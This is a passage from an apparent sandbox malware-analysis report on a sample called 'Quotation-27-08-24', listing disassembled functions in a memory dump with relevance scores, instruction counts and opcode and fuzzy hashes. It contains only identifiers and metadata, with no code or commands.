                                          • Opcode Fuzzy Hash: 7ac998f43ac90617874e4adf0bddd34df11f080518ffefc1d6ceba747bab01e5
                                          • Instruction Fuzzy Hash: 2811F2B58002899FDB20CF9AD584BEEBBF4EB88320F20845AE558A3240C375A544CFA1
                                          Function 053BA570 Relevance: .7, Instructions: 728COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6a2b69d146760451f72fd029fcfa2e19ba712cf799bc70be6291c6f05ba11452
                                          • Instruction ID: 44e66198c6439bca3bbb006b8a1abf083d137377014aab1818a7b86fc49c14c2
                                          • Opcode Fuzzy Hash: 6a2b69d146760451f72fd029fcfa2e19ba712cf799bc70be6291c6f05ba11452
                                          • Instruction Fuzzy Hash: 2E723F31910619CFDB14EF68C898AEDBBB1FF45301F408299D54AA7265EF70AAC5CF81
                                          Function 053B74F0 Relevance: .6, Instructions: 551COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 540f4365f49c0e4c5e1bbf2eb504a27a2f2dbef2fc0d5dfefc91d0d4722d0344
                                          • Instruction ID: 6f3ffd2cf721cc44a96cbf0b1f7ac2c404fc13213984a8ea66eb12c905b57e13
                                          • Opcode Fuzzy Hash: 540f4365f49c0e4c5e1bbf2eb504a27a2f2dbef2fc0d5dfefc91d0d4722d0344
                                          • Instruction Fuzzy Hash: 4D42E830E106198FDB15DF68C884AEDF7B1FF89304F108699D559BB661EB70AA85CF40
                                          Function 053BC208 Relevance: .5, Instructions: 500COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: eadf44ccbe8b760730e4fd2e33ac59f21895a2578e0ff9494943333d1157ef88
                                          • Instruction ID: 5e26f9abc357d93584fb286d3bde74b15a5df67823c062a8ed6c67d4c4b7e46f
                                          • Opcode Fuzzy Hash: eadf44ccbe8b760730e4fd2e33ac59f21895a2578e0ff9494943333d1157ef88
                                          • Instruction Fuzzy Hash: 34222C30A00219CFDB14DF69C898BADB7B2BF88300F5495A9D50AEB765DBB0AD45CF50
                                          Function 053BA6A0 Relevance: .4, Instructions: 418COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 24ec80ce4f1e7c7a1376d4a591b18c147954f84b482783b1ca644e8def2d097d
                                          • Instruction ID: 951ede44d8881b7bec369cc8ae1b15f828c24ad12609c124e8ea09c5f14b92e6
                                          • Opcode Fuzzy Hash: 24ec80ce4f1e7c7a1376d4a591b18c147954f84b482783b1ca644e8def2d097d
                                          • Instruction Fuzzy Hash: BE122D31A00619CFDB25DF68C898AD9B7B1FF45301F448299D94AA7265EF70AEC5CF80
                                          Function 053BE650 Relevance: .4, Instructions: 352COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: aae49151812b38cd5e4afb7900b0d00fc558758aa99b82706ae715d5b13ed177
                                          • Instruction ID: ec9fae4bf8d763ca10b14224a66114650c1e6efdaca9bb90bec50beab4f81c77
                                          • Opcode Fuzzy Hash: aae49151812b38cd5e4afb7900b0d00fc558758aa99b82706ae715d5b13ed177
                                          • Instruction Fuzzy Hash: E5E10978B11600CFDB299B78C4586A97BBAFF89701F10446EE607DB760DBB69841DB01
                                          Function 053B74EA Relevance: .3, Instructions: 329COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b901fccc92c9d95e7b0a3c8031d87902167f96f96b79a580816b01ec9e1943e9
                                          • Instruction ID: 920f7fb2f7dae2b9ca4c0b3e0cd5e395a113fb31bbc6b6c66efc473dbcce2c8f
                                          • Opcode Fuzzy Hash: b901fccc92c9d95e7b0a3c8031d87902167f96f96b79a580816b01ec9e1943e9
                                          • Instruction Fuzzy Hash: 06E1FB31E006198BDB25DF68C884AEDB7B2FF89304F108699D559BB651EB70AE81CF40
                                          Function 053B399C Relevance: .3, Instructions: 295COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e5dd2be382e69412e25cb0de84359384b89144cacb53f04a6c2a41be6e77a2e1
                                          • Instruction ID: 692b73c209051071a242df6d075e59cd4e6dadabd2cb63b445927c4fafb65265
                                          • Opcode Fuzzy Hash: e5dd2be382e69412e25cb0de84359384b89144cacb53f04a6c2a41be6e77a2e1
                                          • Instruction Fuzzy Hash: 1391EC71A05208DFDB18DFA9E8586EEBFB6FF88310F14846AE545A7641DB70A801CB51
                                          Function 053BBE40 Relevance: .3, Instructions: 268COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7bc046f1b9f41f891a36f98d96504821beace784e74f4f52b91d1dc4d1d372cd
                                          • Instruction ID: a9bbc05955c9bc9dfd7bfe2d798e491f96de44069af4f9ec94927f8f7a3dc7c9
                                          • Opcode Fuzzy Hash: 7bc046f1b9f41f891a36f98d96504821beace784e74f4f52b91d1dc4d1d372cd
                                          • Instruction Fuzzy Hash: FEC10730A10619CFDB24DF68C894ADDF7B1FF89304F5586A9E549AB221EB70AD85CF40
                                          Function 053BBE31 Relevance: .2, Instructions: 211COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bedfc1b61b9703f4807c3db843437eb49265c47bc99d49ead1584a79abf506b4
                                          • Instruction ID: 6943e94a262f2c0df14e51234fa932b564a614e60d603c492332fe9559c312c3
                                          • Opcode Fuzzy Hash: bedfc1b61b9703f4807c3db843437eb49265c47bc99d49ead1584a79abf506b4
                                          • Instruction Fuzzy Hash: F1A1E835A1061ACFDB14DF64C884AD8F7B1FF89304F1586A9E549BB221EB70AE85CF40
                                          Function 053BD7D8 Relevance: .2, Instructions: 207COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1d944e0156a31089f4a7868514f70401c7687bebc3df2da3a97a58caec14395f
                                          • Instruction ID: f945d058aaa584330d14061680249ec2134faa3dea52d02bca4e8ec6b3418a24
                                          • Opcode Fuzzy Hash: 1d944e0156a31089f4a7868514f70401c7687bebc3df2da3a97a58caec14395f
                                          • Instruction Fuzzy Hash: C7813F30A10219CFDB08EBA5C894BEDB7B2FF89300F558569D506AF658DBB0AD45CB90
                                          Function 053B9EF0 Relevance: .2, Instructions: 199COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4d2d7f02a3c246f8f1741a6371113091643293ebc02414880a97bbb687a8c921
                                          • Instruction ID: 1c42be9bbd3837fd6f12cc8c46b00bd48face6085f721bc64397716214855ac9
                                          • Opcode Fuzzy Hash: 4d2d7f02a3c246f8f1741a6371113091643293ebc02414880a97bbb687a8c921
                                          • Instruction Fuzzy Hash: 3A91097591060ACFCB41DF68C880999FBF5FF49310B14C79AE919AB255EB70E985CF80
                                          Function 053B9280 Relevance: .2, Instructions: 181COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 88437c94ba59d71d345c9542b5e9e9ad17bd5019dd79d238ff415723a91b5076
                                          • Instruction ID: 9bc4ebb88fcfa04d3435a3dec31e4d1b3c42905ebcc2874ee301ccc7f85218e9
                                          • Opcode Fuzzy Hash: 88437c94ba59d71d345c9542b5e9e9ad17bd5019dd79d238ff415723a91b5076
                                          • Instruction Fuzzy Hash: B371CD79600A00CFC718DF29C498959BBF2FF897047158AA9E64ACB772DB72EC41CB50
                                          Function 053B90A0 Relevance: .2, Instructions: 172COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 950ac313aed18fa3ef2ac8047bdd5bf96d5e5bd34cebb94765804d64eadda1d5
                                          • Instruction ID: bad6d206095332d68de5c8ca3de887389d56448f9d1f9f1d78501914006374e9
                                          • Opcode Fuzzy Hash: 950ac313aed18fa3ef2ac8047bdd5bf96d5e5bd34cebb94765804d64eadda1d5
                                          • Instruction Fuzzy Hash: 4671A375A0420A8FDB04CF69C584A99FBF1BF4C314B0986A9E90ADB752D774EC85CF90
                                          Function 053BD7C7 Relevance: .2, Instructions: 166COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 984a09e0e73752dc74be6ecd79760028581aabaebcd142c283197aa74d6c1e9b
                                          • Instruction ID: f02d2d02f3379ff11d7742f644db2d73fc6714220a8bab20ea8a9ad8659aa54d
                                          • Opcode Fuzzy Hash: 984a09e0e73752dc74be6ecd79760028581aabaebcd142c283197aa74d6c1e9b
                                          • Instruction Fuzzy Hash: A4612F30A10219CFDB04DFA5C884BEDB7B2FF89300F558665E606AF658DBB0A945CB90
                                          Function 053BC1F8 Relevance: .2, Instructions: 164COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: be7320c1d620d9ab8dbc09a930538faac843519fa93733512d5d13268ea1b5d0
                                          • Instruction ID: f3c7333564aec79ceacd83621944443adaac03d68b0c34fbd4e08bd3afc6773f
                                          • Opcode Fuzzy Hash: be7320c1d620d9ab8dbc09a930538faac843519fa93733512d5d13268ea1b5d0
                                          • Instruction Fuzzy Hash: 69514A30710605CFDB18EF69C898BAD77A2BF89310F5496B8D5169B7A1DBB0AC058B50
                                          Function 053BFBB1 Relevance: .2, Instructions: 164COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f5ed473f515a842f81a4b1531e77692e62929c00f718833bc41a4794bf7bc907
                                          • Instruction ID: 94eda1d09cb295f709d09e5c286123ad31a5deb321ab601471a628819d2f27a7
                                          • Opcode Fuzzy Hash: f5ed473f515a842f81a4b1531e77692e62929c00f718833bc41a4794bf7bc907
                                          • Instruction Fuzzy Hash: 04615170A10609DFDB04EFA8C8549EEFBB5FF84300F10851AE546AB354EB70A995CB81
                                          Function 053BFBC0 Relevance: .2, Instructions: 160COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 90dcfe1f9ed90e44b310104d15eb171edbec549d7981eefe45357f7f86d8b313
                                          • Instruction ID: 8f62ca0b99fce56366ecdbd5c22473356d59e67a7796b672329f440716504932
                                          • Opcode Fuzzy Hash: 90dcfe1f9ed90e44b310104d15eb171edbec549d7981eefe45357f7f86d8b313
                                          • Instruction Fuzzy Hash: 94615370A10609DFDB04DFA8C8549EEFBB5FF85300F00851AE546AB354EB709995CF81
                                          Function 053B2FA4 Relevance: .2, Instructions: 155COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 10d9f0296df068458f46699c13bcde44da488785c913881591758deba8b76007
                                          • Instruction ID: a6a8d3e14e6d7a5244c31e5dc5f59928825954c97687e8904f1422f6614caca7
                                          • Opcode Fuzzy Hash: 10d9f0296df068458f46699c13bcde44da488785c913881591758deba8b76007
                                          • Instruction Fuzzy Hash: CE5162B5E002199FDF14DFA9C8086EFBBFAEF88310F10851AE515E7251EBB49905CB90
                                          Function 053B7D48 Relevance: .1, Instructions: 137COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 359b3c5271ff87361659070cb911b1b0653bce49d9c098639add51bd15f99934
                                          • Instruction ID: fb215907fbd33afd5d943b6b8c027218e5466cb0b719d21fce684630f9570bc2
                                          • Opcode Fuzzy Hash: 359b3c5271ff87361659070cb911b1b0653bce49d9c098639add51bd15f99934
                                          • Instruction Fuzzy Hash: 1A5117347006048FDB19DB68D498AAEBBF6FF88310F148568E646DBB61DBB5EC41CB50
                                          Function 053B3C10 Relevance: .1, Instructions: 128COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9e151831fa1cb61cbff4d24492792344a94935ee64f159d161cd4475bcc693ff
                                          • Instruction ID: 83d332c5678fc6d41b1422cf98b9d44934be13fa93d81a3d7e93a5aea52f22ce
                                          • Opcode Fuzzy Hash: 9e151831fa1cb61cbff4d24492792344a94935ee64f159d161cd4475bcc693ff
                                          • Instruction Fuzzy Hash: 3141D675B002158FDB49EBB988545FE7BF7EFC8200B14442AE106EB391EF349D0687A1
                                          Function 053B8178 Relevance: .1, Instructions: 103COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1c345b811803f41603f10bdae1c167d7901ed504a50c274c8648a7b511a14aff
                                          • Instruction ID: d996bb129a2a47c3cf2633349c924606b80b7bc4c8be6aee989e3e1a6d559c98
                                          • Opcode Fuzzy Hash: 1c345b811803f41603f10bdae1c167d7901ed504a50c274c8648a7b511a14aff
                                          • Instruction Fuzzy Hash: 4D415034A10709CFCB14EF68C8849EDB7B2FF84304F018559D256AB365EB71A946CB81
                                          Function 053B8188 Relevance: .1, Instructions: 101COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8e4ce13a666e65f2a54446a75730367b7caefbc37b842d9891e8168dcd02c8e7
                                          • Instruction ID: 13012636203d7b431e2a8a32c4708dcab6f8a5fda815342784d5b0f63a09a13e
                                          • Opcode Fuzzy Hash: 8e4ce13a666e65f2a54446a75730367b7caefbc37b842d9891e8168dcd02c8e7
                                          • Instruction Fuzzy Hash: 3A414F34A10709CFCB14EF68C8849EDBBB6FF89304F008559E2166B365EB71A945CB81
                                          Function 053B405C Relevance: .1, Instructions: 100COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4397212935568976d001f31a7e0941684e19c0c1ec9ca8da7d90791dff881a19
                                          • Instruction ID: 783977db9a9e64a3b6353344daaa004f634ca859787e031787068ee5243dd738
                                          • Opcode Fuzzy Hash: 4397212935568976d001f31a7e0941684e19c0c1ec9ca8da7d90791dff881a19
                                          • Instruction Fuzzy Hash: 5F41D2B1D00309DBEF10CFAAC984ADEBBB6BF58704F648119D509BB201D7B56A45CF94
                                          Function 053B2FE4 Relevance: .1, Instructions: 99COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b87604276066d5570db9aaa0a9a78dd1ce010ab939099f08b967d66694a0e70d
                                          • Instruction ID: 245c4deb6bbf4e53fab2fe3f3785901115e0c0e2bd7584312a80cfe01d41d2fb
                                          • Opcode Fuzzy Hash: b87604276066d5570db9aaa0a9a78dd1ce010ab939099f08b967d66694a0e70d
                                          • Instruction Fuzzy Hash: 5941D2B1D00709DBEF10CFA9C984ADEBBB5BF58704F248129D509BB201D7B56A45CF94
                                          Function 053B9091 Relevance: .1, Instructions: 97COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6233e196fd261c452ace7a3532a95f5f22a343d96b4ebab6b7de420e137df911
                                          • Instruction ID: add3a0fd1302f9859297186d4f34f6c19c995be30bec3e509799dfeb5d9e829e
                                          • Opcode Fuzzy Hash: 6233e196fd261c452ace7a3532a95f5f22a343d96b4ebab6b7de420e137df911
                                          • Instruction Fuzzy Hash: 6D411975A042068FDB14CF68C584A99FBF5FF49300B0986A9EA0ADB751E771EC45CF90
                                          Function 053B2F98 Relevance: .1, Instructions: 95COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8c713dae0ffd41f45591480a73596b7a60035d39e7a3e0b94ca9669466458e84
                                          • Instruction ID: ac9b665015e0c33bfddc856ea2b77e9a4bb0c17fd363eb1e9a09b801186761da
                                          • Opcode Fuzzy Hash: 8c713dae0ffd41f45591480a73596b7a60035d39e7a3e0b94ca9669466458e84
                                          • Instruction Fuzzy Hash: F141BEB1D00359DBDB14CF9AD884ADEFBB5BF48710F20862AE418BB250DBB56845CF90
                                          Function 053B5EF9 Relevance: .1, Instructions: 95COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cd15b9d533f9910ee807b44060f84e9d93b310153ff8869cd3833ef7d745a651
                                          • Instruction ID: d6df5c6bb31ce8a45e1fec1180c04cbfc75b36c2c08b1aad70c8d01397cabf59
                                          • Opcode Fuzzy Hash: cd15b9d533f9910ee807b44060f84e9d93b310153ff8869cd3833ef7d745a651
                                          • Instruction Fuzzy Hash: E9412775A0020ADFCB04DF68C8849AEFBB5FF49310B14C299E919AB315E770E985CF90
                                          Function 053B3D83 Relevance: .1, Instructions: 93COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 47c2f1a980d906b32d5f82454607ea908b7cc67ad28251630c7d008aa185ec23
                                          • Instruction ID: 1d84bee19526c8f7773e14ba3b34ff9afd89cef298b73da64e1dd394d63ccd3e
                                          • Opcode Fuzzy Hash: 47c2f1a980d906b32d5f82454607ea908b7cc67ad28251630c7d008aa185ec23
                                          • Instruction Fuzzy Hash: 4241AEB1D00359DBDB14CF9AD884ADEFBB5BF48710F24852AE418BB250DBB56845CF90
                                          Function 053B8080 Relevance: .1, Instructions: 92COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d25fd3a0e4b86bee471bf8f8b513a68cfd16a19ba4d7eca37872537c8af151ce
                                          • Instruction ID: 95d8cc2ff4f02a912d60141be831bb08bdb213fb64e95d28bab58fc8c0d73942
                                          • Opcode Fuzzy Hash: d25fd3a0e4b86bee471bf8f8b513a68cfd16a19ba4d7eca37872537c8af151ce
                                          • Instruction Fuzzy Hash: 65318F35B006199FDF09EF64E8448EDF7B6FFC9214B048669E506AB360EB71AD45CB80
                                          Function 053B5F08 Relevance: .1, Instructions: 92COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c0ed59fbf078b37b08effb22010c5496cc4c11b0ec7b57e43f3cb8334a20cea6
                                          • Instruction ID: b8d7a4e41e3d0d8ddae22a2e520ca6a750dcadf5d176f645d1516aa2d4d5e9d7
                                          • Opcode Fuzzy Hash: c0ed59fbf078b37b08effb22010c5496cc4c11b0ec7b57e43f3cb8334a20cea6
                                          • Instruction Fuzzy Hash: 96411775A0020ADFCB44DF68D88499EFBB5FF49310B14C259E918AB315E770E985CF90
                                          Function 053BDD80 Relevance: .1, Instructions: 90COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ecda0c46cf8400acb44f223e66ada0e40c25b76891fb402a2b974355efe130e7
                                          • Instruction ID: c188b6def91a6ccc29c5b1490139bd2c40c17d56cb02fc1d95ad748da7cc45fc
                                          • Opcode Fuzzy Hash: ecda0c46cf8400acb44f223e66ada0e40c25b76891fb402a2b974355efe130e7
                                          • Instruction Fuzzy Hash: 0B2124357042105BDB08B779941A7BEB7A7EFC4710F58886EE60AEB791CE794C0287E1
                                          Function 053B6AF8 Relevance: .1, Instructions: 89COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 226d8bf1b53a3c8f0991cfd291867d9a8b9aa8261f4f3692f774872aa600d380
                                          • Instruction ID: ce86dd248a7b0ae719da67726024d0d088ace962068666a98b232931a8d16b22
                                          • Opcode Fuzzy Hash: 226d8bf1b53a3c8f0991cfd291867d9a8b9aa8261f4f3692f774872aa600d380
                                          • Instruction Fuzzy Hash: 1C21B7323142008FE714DB2DCC846A93BE6FFC5711B1991B6E20ACF7A6DAB5DC058B50
                                          Function 053B41E0 Relevance: .1, Instructions: 85COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ffd162c484b07a92b4aecc722a3bc9a1feb814f18abd3ad7e6a9eb58c9ec08c1
